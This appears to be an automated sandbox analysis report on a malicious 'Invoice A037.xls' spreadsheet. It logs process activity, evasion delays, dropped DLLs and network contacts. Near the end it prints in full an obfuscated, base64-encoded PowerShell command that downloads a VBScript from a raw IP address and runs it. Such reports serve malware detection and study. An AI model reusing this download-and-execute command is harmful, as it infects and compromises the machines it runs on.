Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: Invoice A037.xls	Stream path 'MBD00090642/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Invoice A037.xls	Stream path 'Workbook' entropy: 7.99881984082 (max. 8.0)
Source: CA430000.0.dr	Stream path 'MBD00090642/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: CA430000.0.dr	Stream path 'Workbook' entropy: 7.99874064823 (max. 8.0)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8352	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1562	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1880	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7969	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1012
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 557
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1253
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6490

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.dll			Jump to dropped file

Source: C:\Windows\System32\mshta.exe TID: 3548	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740	Thread sleep count: 8352 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740	Thread sleep count: 1562 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 4060	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2240	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2240	Thread sleep time: -3600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2240	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1372	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860	Thread sleep count: 1012 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376	Thread sleep count: 557 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3948	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3368	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 3760	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004	Thread sleep time: -1200000s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 45.63.94.214 443
Source: C:\Windows\System32\wscript.exe	Domain query: paste.rs

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3912, type: MEMORYSTR

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD3B4.tmp" "c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP"	Jump to behavior
